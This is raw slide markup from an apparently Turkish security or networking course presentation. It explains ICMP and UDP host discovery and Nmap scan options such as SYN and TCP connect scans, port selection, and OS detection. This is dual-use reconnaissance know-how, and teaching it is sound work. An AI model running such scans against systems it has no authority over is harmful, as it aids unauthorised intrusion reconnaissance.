              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bu tarama türünde kaynak makina hedef makinaya tek bir ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> istek paketi gönderir. IP adresi erişilebilir ve ICMP filtreleme bulunmadığı sürece, hedef makina ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> cevabı döndürecektir</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>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tr-TR" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kaynak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> makinanın hedef makinaya göndereceği UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>datagramına</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, ICMP Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> cevabı döndürülüyorsa hedef makina kapalı kabul edilecektir.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3724206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E941E7-7BC3-CE90-3848-C3B69DC36334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap’te</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Kullanılan Opsiyonlar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E94F45-408F-6397-183B-D0276636FECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-v, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Tarama için gösterilecek detayı belirtilir.</a:t>
            </a:r>
          </a:p>
          <a:p>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sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> taraması. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Yarı açık</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tarama adı verilen bu yöntem ile hedef sisteme gönderilen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> paketlerine karşılık hedef sistemden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN + ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> paketinin alınması beklenir. Bu durumda hedef portun durumu açık olarak raporlanmaktadır.</a:t>
            </a:r>
          </a:p>
          <a:p>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sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> taraması. Tam tarama adı verilen bu yöntemde 3 yollu el sıkışmanın (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>handshaking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) tamamlanmış olması gerekmektedir. Bu durumda hedef portun durumu açık olarak raporlanmaktadır. Yarı açık taramaya nispeten daha yavaş ancak daha güvenilir bir tarama yöntemidir. Özellikle dış alan ağlarındaki taramalarda tercih edilmektedir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> : Tarama gerçekleştirilecek portlar. Ör: -pT:25,U:53 ; -p80,443 ; -p1-100 ; -p[1-65535] ; -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>smtp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ; -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>* ; -p-;  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1604367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F488423-8826-7120-6F58-C731FEBDBF0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278605" y="301109"/>
            <a:ext cx="11580020" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Sadece açık portları gösterilsin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> veya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–top-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: En çok kullanılan (</a:t>
            </a:r>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etc</a:t>
            </a:r>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services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> dosyasında bulunan) 100 port taransın. Hızlı tarama amacıyla kullanılır</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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iL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: IP listesini içeren dosya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İşletim sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i (OS) tespiti. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bu işlem için hedef sisteme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> paketleri göndererek ardından aldığı cevapları </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap-os-db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> dosyasındaki imzalar ile karşılaştırarak hedef sistemin işletim sistemi sürüm bilgisini raporlayabilmektedir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="0" i="0" dirty="0">
